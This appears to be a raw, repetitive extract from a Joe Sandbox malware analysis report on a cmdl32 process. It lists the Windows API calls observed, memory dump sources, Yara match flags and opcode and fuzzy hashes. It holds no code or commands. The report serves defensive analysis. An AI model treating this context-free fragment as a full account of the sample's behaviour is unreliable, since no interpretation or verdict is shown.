                                                                                        • Instruction Fuzzy Hash: 97E1B4B0D05258CBEB24CF85C998BDDBBB2BF44308F108199D20A7B385D7B95A89CF55
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0271C284
                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0271C2BF
                                                                                        • FindClose.KERNELBASE(?), ref: 0271C2CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: d62c77a763d0dd3a0b99af2df67761c8a21f41accff8b72375e27316c38466b5
                                                                                        • Instruction ID: 6553d95c720014bcc876fabbac5f3dcb6892071550336fd2600b8fdc84f5d642
                                                                                        • Opcode Fuzzy Hash: d62c77a763d0dd3a0b99af2df67761c8a21f41accff8b72375e27316c38466b5
                                                                                        • Instruction Fuzzy Hash: CE317372940308ABDB25DFA4CC89FFF77BCAF44B48F14445DF508A6190DA70AA848FA5
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02728C2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 5efa377fa8e998bf9b0909703a42f8660daa4dc989758ee5f507b796ead848dd
                                                                                        • Instruction ID: 7827999bb503ddfa54d0e1d901f1688ef40fbb5cf3c0ee7995a156e5f7cbe574
                                                                                        • Opcode Fuzzy Hash: 5efa377fa8e998bf9b0909703a42f8660daa4dc989758ee5f507b796ead848dd
                                                                                        • Instruction Fuzzy Hash: 1D31C2B5A01648AFDB14DF98D881EEFB7F9AF8C314F508119F909A7240D730A955CFA4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: db38f67fbdf322ebba04da6c488d31a65cae5a3fc2cdc8fc6db508bd593f6aa0
                                                                                        • Instruction ID: a83d41ff0ebd33bf658dd72d9e958ce5d0e84c6c229227a6e98935e492ad5fe1
                                                                                        • Opcode Fuzzy Hash: db38f67fbdf322ebba04da6c488d31a65cae5a3fc2cdc8fc6db508bd593f6aa0
                                                                                        • Instruction Fuzzy Hash: 6590023164560803F100B158451870620498BD1205F65C422A0525569D8795DA5175A2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1b9fb759b87d03b31bc087a00c71e213b60269ffa73e588802c1ad82c3bd52fc
                                                                                        • Instruction ID: 9f409d3152b5bbceb156351fee66bf13f2e537023d4f7eccddb0700797f76ae9
                                                                                        • Opcode Fuzzy Hash: 1b9fb759b87d03b31bc087a00c71e213b60269ffa73e588802c1ad82c3bd52fc
                                                                                        • Instruction Fuzzy Hash: 96900261641604436140B158480840670499BE2305395C126A0655561C8718D955A269
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ad885fa03229aafe332d007f230e5abf1a27fc929e3c9c4fd41bc7cf0ce9a9e5
                                                                                        • Instruction ID: a8e9353964e7cb361a74b55d25a643868b092fc2f4a384bffc9cb4df7320f14b
                                                                                        • Opcode Fuzzy Hash: ad885fa03229aafe332d007f230e5abf1a27fc929e3c9c4fd41bc7cf0ce9a9e5
                                                                                        • Instruction Fuzzy Hash: 2690023164590413B140B158488854650499BE1305B55C022E0525555C8B14DA566361
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7d72e291f004a38a097918f3aa0f8695512705a96aa92d60b3a5dec0654902d3
                                                                                        • Instruction ID: 4a39f9189bd1cd0699124611cbc2153f21f9b9463cbbd80cb6d2929de3566b09
                                                                                        • Opcode Fuzzy Hash: 7d72e291f004a38a097918f3aa0f8695512705a96aa92d60b3a5dec0654902d3
                                                                                        • Instruction Fuzzy Hash: B390023124150803F100B598540C64610498BE1305F55D022A5125556EC765D9917131
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e0fa32663f95a041869fd077c57045438bbce8528250ebe3d135ef2a7e7d99ad
                                                                                        • Instruction ID: f1f21a487aa0867b466ff18f2d994fd88445a33943c088eff438a345009db96c
                                                                                        • Opcode Fuzzy Hash: e0fa32663f95a041869fd077c57045438bbce8528250ebe3d135ef2a7e7d99ad
                                                                                        • Instruction Fuzzy Hash: 0290023124158C03F110B158840874A10498BD1305F59C422A4525659D8795D9917121
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 33828634573a046513f6f395dc59f3550c2c2c76c19ccdafb514b1daef28b056
                                                                                        • Instruction ID: 5d531e98c78c69d605221b84807c39000be2a98ecc790c1cbb8b2d9c60694058
                                                                                        • Opcode Fuzzy Hash: 33828634573a046513f6f395dc59f3550c2c2c76c19ccdafb514b1daef28b056
                                                                                        • Instruction Fuzzy Hash: 0390023124150C43F100B1584408B4610498BE1305F55C027A0225655D8715D9517521
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1eeef839e5b3a3dd7c0aee00ce2d54eb06831c59bebc5f3d810a7ad25c65d51d
                                                                                        • Instruction ID: 482b44daa88b781de858932aedbfb1d6e40b5c871896b13689d95eeb88651d0e
                                                                                        • Opcode Fuzzy Hash: 1eeef839e5b3a3dd7c0aee00ce2d54eb06831c59bebc5f3d810a7ad25c65d51d
                                                                                        • Instruction Fuzzy Hash: 4A900221282545537545F1584408507504A9BE1245795C023A1515951C8626E956E621
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 18c471d727e4af9c795c3a55d53c26781b7010a3d97db1938e01c485873d49d1
                                                                                        • Instruction ID: 2f7c2d628181a58c73b721259672e7c8c0bfc309bcfa072a4ce7a4d56aee92bc
                                                                                        • Opcode Fuzzy Hash: 18c471d727e4af9c795c3a55d53c26781b7010a3d97db1938e01c485873d49d1
                                                                                        • Instruction Fuzzy Hash: CE90023124150813F111B1584508707104D8BD1245F95C423A0525559D9756DA52B121
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7cc4fe2c8aa8fdf2e0ffb371d26d1d5e7910b333a66d95bdae83e3dd1700be4f
                                                                                        • Instruction ID: 55ac6bf089a0961f1f4cb7d27e533210f55540c6470eab755641445a13d8b9d6
                                                                                        • Opcode Fuzzy Hash: 7cc4fe2c8aa8fdf2e0ffb371d26d1d5e7910b333a66d95bdae83e3dd1700be4f
                                                                                        • Instruction Fuzzy Hash: 2F90022925350403F180B158540C60A10498BD2206F95D426A0116559CCA15D9696321
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709BD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027141D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02717EEE,00000010,?,?,?,00000044,?,00000010,02717EEE,?,?,?), ref: 0272928D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709BD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027141D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02711649,?,02725A1F,02711649,0272511F,02725A1F,?,02711649,0272511F,00001000,?,?,00000000), ref: 0272918F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 02710A17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_2700000_cmdl32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.00000000049BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_4890000_cmdl32.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0